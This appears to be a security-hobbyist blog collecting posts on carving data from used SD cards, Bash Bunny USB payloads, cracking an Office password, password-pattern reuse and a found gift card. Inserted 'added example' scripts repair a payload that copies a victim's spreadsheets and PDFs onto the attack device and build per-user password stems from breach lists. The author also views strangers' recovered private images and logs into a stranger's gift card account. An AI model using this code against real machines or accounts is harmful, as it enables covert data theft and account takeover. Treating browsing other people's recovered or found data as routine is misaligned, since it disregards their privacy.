Resurrecting Carelessly Discarded Data

I picked up a large batch of MicroSD cards and adapters for an upcoming project. I’m cheap, and the data reliability isn’t critical, so I picked up used cards on eBay. After I made the purchase, it occurred to me that this was a potential teaching moment, both to freshen my own skills and to raise awareness for others who may not pay as much attention as those of us in the field.

TLDR: If you don’t know how deleted your data really is, don’t give, sell or return writable media. Either learn how to securely erase your data and confirm that it has been erased, or toss it in a fire.

So before they showed up, I installed the latest version of Autopsy on a fresh Windows box. Fresh because, well, just like I’m assuming that others might have been careless in data deletion, I have to guard against being careless about sticking random cards in my machines.

So they arrived. The moment of truth was here. I pulled out the first MicroSD, stuck it in the first adapter, and inserted it into a USB slot on the PC.

Predictably, it pops up as a blank, formatted card. Let’s see what Autopsy sees…

Let’s see, it’s been a while since I played with Autopsy. Let’s go with:
* Add Data Source

Let’s call it
* Card001
* Local Disk
* Select Disk. On my machine it showed up as H:
<Next>

I’m leaving everything checked here. If this was true forensics I might be more choosy, but I’m not.

Looks like the first test is examining the file system. “Adding $OrphanFiles,” it says.

After that, it tells me file analysis has started. I can hit finish, but I can tell by the progress bar in the lower right that it’s still analyzing stuff. This process goes on for a few minutes.

After the file analysis phase, it moves on to the data integrity phase.

Finally it’s done. I browse the card in the data source tree. Ooh, look, there are recovered files in the $CarvedFiles folder! Baby pics, family pics, and yes… porn. Folks, I recycled porn from the very first used SD card I tested.

So I’m up to card 28 now, and a few patterns emerged.

The metadata shows a strong preponderance of Nokia 5300 as the image source. This tells me these cards were likely sold by a shop servicing Nokia phones. The mp3 and video content I’ve extracted so far shows a strong trend toward Spanish-speaking content, and a few of the images with recognizable stuff on them actually mentioned Mexico.

I need to dig deeper into metadata, but visually it appears that at least some of the porn is homemade. Some of the cards had porn images which had likely been downloaded from the internet, as I discovered by running them through TinEye.

I’ve really got to refresh my Autopsy skills. I don’t do forensics for a living, but it helps to know the workflow of someone who does, in case you might one day find yourself protecting yourself from an enthusiastic forensic investigator.

Further learning: There are hash sets you can obtain that validate the files you find against known file hashes, which is the prudent thing to do if you don’t know what your found media might contain. It’s good to know you’re handling CSAM before you actually view CSAM.
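As an added example (not from the original post, and not Autopsy’s own hash lookup module), here is what that triage step looks like on the command line: hash every carved file and look it up in a hash set before anyone opens it. Real sets such as NIST’s NSRL (known software) or a restricted “known bad” set are keyed by SHA-1 or MD5; the hash set here is a constructed two-column file, and the carved files are constructed too. Anything not in the set is reported UNKNOWN and goes to manual review; anything that is in the set is reported with its label and never needs to be viewed.

```shell
#!/bin/sh
# Added example: triage carved files against a hash set (constructed data).
# sha1_of FILE -> hex SHA-1. coreutils sha1sum on Linux, perl shasum on macOS.
sha1_of() {
  if command -v sha1sum >/dev/null 2>&1; then sha1sum "$1"; else shasum -a 1 "$1"; fi | cut -d' ' -f1
}

# triage_dir DIR HASHSET -> one line per file: "<LABEL|UNKNOWN> <sha1> <path>"
# HASHSET lines are "<sha1> <label>" (assumed format for this example).
triage_dir() {
  dir="$1"; set_file="$2"
  find "$dir" -type f | sort | while IFS= read -r f; do
    h=$(sha1_of "$f")
    label=$(awk -v h="$h" '$1 == h { print $2; exit }' "$set_file")
    printf '%s %s %s\n' "${label:-UNKNOWN}" "$h" "$f"
  done
}

# demo_triage: two constructed "carved" files, only the first is in the set
demo_triage() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/CarvedFiles"
  printf 'GIF89a stock clip-art placeholder\n' > "$tmp/CarvedFiles/f0000001.gif"
  printf 'unknown bytes carved from slack\n'   > "$tmp/CarvedFiles/f0000002.jpg"
  printf '%s KNOWN_CLIPART\n' "$(sha1_of "$tmp/CarvedFiles/f0000001.gif")" > "$tmp/hashset.txt"
  triage_dir "$tmp/CarvedFiles" "$tmp/hashset.txt" | sed "s#$tmp/##"
  rm -rf "$tmp"
}
```

Point this at Autopsy’s export of $CarvedFiles and a real hash set and you get a worklist where the UNKNOWN lines are the only ones a human has to look at; the awk lookup is linear per file, so for a large set you would pre-sort it and use a join or a proper database instead.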

Just Because I’m Paranoid…

Doesn’t mean they’re not out to get me.

So I ordered some more PCBs, what, ten days ago now. This evening after dinner I was thinking, “wow, I should have gotten a ship notice by now…” then, a few minutes later, it showed up. That’s not the paranoid part.

The shipping notice from the fab house was normal, package on the way via DHL, etc.

An hour or so later, I got a phishing email purporting to be from DHL.

I get lots of phishing emails. I’m not going to categorize them based on quality, because to me, almost all phishing emails are low effort.

But I think it’s strange that I, who normally only get DHL packages a couple times per year, get a DHL phishing email within an hour or so of an actual DHL package being sent my way.

Now I’m not saying there’s a connection, but if there is a connection, then either:
1) Someone’s got access to the fab house records;
2) Someone’s got access to DHL records; or
3) Someone’s got access to the “Deliveries” tracking app. (I entered the tracking info into that app like I do every time I learn of a package enroute). I suspect this, the rogue phone app, is most likely.

If I’ve got any phishing expert mutuals that have anything to share, I’m all ears.

Bashbunny — still fun in 2021? (part 1)

I decided to dust off my Hak5 field kit and refamiliarize myself with all the tools. I have the bashbunny, the LAN turtle, the rubber ducky, and a bunch of utility adapters. I also have a wifi cactus in there, but I’m pretty sure I picked that up separately.

I started with the Bashbunny, since it’s so versatile. I won’t address advanced topics like locked PCs in this post, this is very basic bashbunny talk. So the scope here is “some dumbass left me unmonitored access to a PC.” Either unattended, or “here, you drive while I go get a drink.” Yeah, don’t do that with someone who might have these tools and tendencies.

So the first thing I noticed was that it was out of date. Fortunately, Hak5 has very usable instructions and tools for making it current.

So I went through all that process, bringing my payloads and firmware up to current levels. It was a fun exercise.

The first script I ran was recon/MacProfiler. I set the Bashbunny to Arm, copied the payload.txt into switch1/, ejected it, switched the Bashbunny to position 1, and reinserted it.

Ran once, and it left the bashbunny mounted. The second time I ran it, it successfully ejected itself, which is important if you’re trying to be a bit stealthy. At some point I’ll investigate that further.

It worked well. It gathered a list of all of the /Applications on my MacBook Air, a list of all users, and all the networking information I might need. Oh, and a list of things that startup automatically. All of this is tremendously useful for recon, so that you can craft a later attack for next time you have access to the same PC.

Next, I tried macinfograbber. Similar concept, but it’s specifically crafted to grab a copy of any spreadsheets (xls/xlsx) in the user’s Documents directory. By extension, of course, this could mean whatever type of files you’re specifically aiming for.

(arm) (eject) (switch) (reinsert)

OK, this did some stuff, then ended with a red LED indicator on the bashbunny. This translates to “no files found” according to the script. Kind of surprising. Do I really have no xls/xlsx files in my Documents directory? Let’s see… Hmmm, yep. I do. Why did it fail? At first I thought maybe it was spaces in the filename and a poorly-written script, but I renamed it to a single word and tried again and it continued to fail.

So I dug deeper. Here’s the command that macinfograbber uses to grab those files:

cp ~/Documents/{*.xlsx,*.xls,*.pdf}  /Volumes/BashBunny/loot/MacLoot/xlsx/

And here’s the problem. I’m assuming these scripts were written back in 2017 when the Bashbunny was fresh. In 2019, Apple switched from bash to zsh on the Macs. And apparently, zsh fails this command if any glob fails for safety reasons. So that line will need to be rewritten, or just broken out into individual commands.
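As an added example (not part of the original post or the Hak5 payload), here is a glob-safe rewrite of that cp line. bash expands an unmatched pattern to itself, so cp copies whatever does exist and only complains about the literal “*.pdf”. zsh, the macOS login shell since Catalina, has NOMATCH on by default: if any one of the three brace-expanded patterns matches nothing it prints “no matches found” and never runs cp at all, so a Documents folder with spreadsheets but no PDFs yields an empty loot directory. The fix is to expand each pattern on its own and skip the ones that matched nothing. The source and destination paths and the demo files are constructed for this example.

```shell
#!/bin/sh
# Added example: glob-safe replacement for
#   cp ~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/loot/MacLoot/xlsx/
# collect_loot SRC DST EXT...  copies SRC/*.EXT into DST and prints the copy count
collect_loot() {
  src="$1"; dst="$2"; shift 2
  count=0
  # zsh: make an unmatched glob expand to nothing instead of aborting the
  # command; bash: same via nullglob; plain sh has neither, which the -e
  # test inside the loop covers.
  setopt null_glob 2>/dev/null || shopt -s nullglob 2>/dev/null || true
  mkdir -p "$dst"
  for ext in "$@"; do
    for f in "$src"/*."$ext"; do
      [ -e "$f" ] || continue          # literal, unmatched pattern: skip it
      cp "$f" "$dst"/ && count=$((count + 1))
    done
  done
  echo "$count"
}

# demo_collect: spreadsheets but no PDFs, the case that kills the one-liner in zsh
demo_collect() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/Documents"
  : > "$tmp/Documents/budget.xlsx"
  : > "$tmp/Documents/old report.xls"   # space in the name: quoting handles it
  collect_loot "$tmp/Documents" "$tmp/loot" xlsx xls pdf
  rm -rf "$tmp"
}
```

In a payload you would call it as `collect_loot ~/Documents /Volumes/BashBunny/loot/MacLoot/xlsx xlsx xls pdf`; note that `shopt -s nullglob` is not scoped to the function in bash, so it stays set for the rest of that shell.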

More on the Bashbunny later. I plan to dig deep through the whole payload library for a 2021 refresh, because it’s still useful. Although you might want to remember to take your USB-C adapter with you for modern MacBooks. 🙂

TIL about john the ripper and trigraph frequencies.

I have an assignment to crack an Office password for a document. I have tried using john and hashcat with several large wordlists, and had no luck, so I decided to go all-in and just leave a Kali instance running john in incremental (brute force) mode for “as long as it takes.” It’s been two days so far.

I have it running within ‘screen’ so that I can occasionally log in to the system remotely to check progress without risk of losing it. I was excited at one point yesterday seeing that it was in the middle of checking seven-character passwords, but then I checked back later and it was checking six-character passwords. This morning, five. I wanted to understand — I assumed (without doing a deep dive on the mechanics) that it would just go literally incrementally. aaaaa, aaaab, aaaac, etc. That was an incorrect assumption.

John’s incremental mode actually operates on “trigraph frequencies.” While I understand the concept of trigraph frequencies (certain sets of three characters occur more frequently than others, and this can help with decryption efforts), I have my doubts as to whether this helps in cracking passwords. Passwords aren’t always natural speech, after all.

Anyhow, it’s been running for two days now, and I’ll post about it again when it’s done just to give an idea of whether it’s successful, and if so, how long it took vs the complexity of the password.

If anyone else wants to try using similar or other methods, let me know, and I’ll send you the hash (generated by office2john). No, I can’t send you the actual document. That would be unethical.

You’re Not Clever: Password Patterns Exposed

Maybe you were reluctant to get on the password manager bandwagon. Passwords are inherently dangerous. Storing them in the cloud, you worry about breaches, you worry about losing access, etc. So you devised a clever pattern you thought would help you weather the storm until we finally get rid of passwords forever.

Maybe your password is a common word, then the first few letters of the site name. Long enough to avoid being guessed via brute force, and complex enough as well.

And that’s worked well for you for the past few years. You’re sitting pretty and haven’t been breached in a widespread attack.

YET.

Here’s the thing — when you use a pattern approach, every breach puts you more at risk, because each one exposes another instance of your pattern. So far the attacks we know about have mostly been credential stuffing: replaying breached username/password pairs as-is against other sites. It’s only a matter of time, if they haven’t started already, before attackers cross-reference your accounts across the various breach lists to build a per-user password list. Once that happens, spotting the pattern in that small set is trivial, and they will own ALL of your accounts.
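As an added example (not from the original post), here is what that per-user cross-reference looks like with nothing more than sort and awk. The breach rows are constructed for this example in the shape site,email,password; real dumps differ in layout, but the join key is always the email or username. Sorting on the email groups one person’s passwords together, the longest common prefix of that group is the reusable stem, and whatever is left over per site is the “clever” part.

```shell
#!/bin/sh
# Added example: derive per-user password patterns from several breach lists.
# breach_rows: constructed sample of three breaches joined by email address
breach_rows() {
  cat <<'EOF'
forum.example,alice@example.com,Sunflower!for
shop.example,alice@example.com,Sunflower!sho
mail.example,alice@example.com,Sunflower!mai
forum.example,bob@example.com,correct horse battery
shop.example,bob@example.com,x7#Lq9!pRz2$wT
EOF
}

# per_user_patterns: one line per account whose passwords share a stem of 4+
# characters across 2+ breaches: "<email> stem=<stem> <site>:+<suffix> ..."
# Accounts with unrelated passwords (bob) produce no line.
per_user_patterns() {
  breach_rows | sort -t, -k2,2 -s | awk -F, '
    function lcp(a, b,    n, i) {            # longest common prefix of a and b
      n = length(a) < length(b) ? length(a) : length(b)
      for (i = 1; i <= n; i++) if (substr(a, i, 1) != substr(b, i, 1)) break
      return substr(a, 1, i - 1)
    }
    function flush(    i) {                  # report the group just finished
      if (n >= 2 && length(stem) >= 4) {
        printf "%s stem=%s", cur, stem
        for (i = 1; i <= n; i++) printf " %s:+%s", site[i], substr(pw[i], length(stem) + 1)
        print ""
      }
    }
    $2 != cur { flush(); cur = $2; n = 0; stem = $3 }
    { n++; site[n] = $1; pw[n] = $3; stem = lcp(stem, $3) }
    END { flush() }'
}
```

The output for the sample is a single line for alice showing the stem “Sunflower!” and a three-letter site suffix per breach; from there, guessing her password on a site that has never been breached is a one-line rule, which is the whole point of the section above.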

Get out now, while you can. MFA where possible, long phrases if MFA is not available, and a random password of 16 or more characters where long phrases aren’t accepted.

If you don’t trust cloud password managers, use something like Keepass, but keep multiple backups in a safe place in case of corruption.

Gift Card Security

Do you use gift cards?  Some people use them to anonymize their purchases, others because financial situations have forced them to.  Take a moment to think about securing them.

Stopped at Wawa on the way home last night, spotted a Vanilla gift card on top of the recycling bin. Why the owner didn’t put it completely in the trash I don’t know, but because I’m a dabbler in magstripe and RFID card security, I always pick up stray cards.

So I took it home, and was able to log into its account, which had not been secured.  It painted a sad picture.

10/8 2:05PM – bought gift card $100
10/8 9:50PM – “Any Lab Test Now” $40 (going rate for a 5-panel drug test)
10/9 2:05AM – Target, $42.90
10/9 10:48AM – Chick-Fil-A $8.43
10/10 6:11PM – Wawa $8.27

So this person bought (or received) a gift card, paid for his or her drug test, bought something at Target, ate at Chick-Fil-A, then spent his or her last $8.27 on gas, zeroing the card out in two days, and then leaving it in plain sight.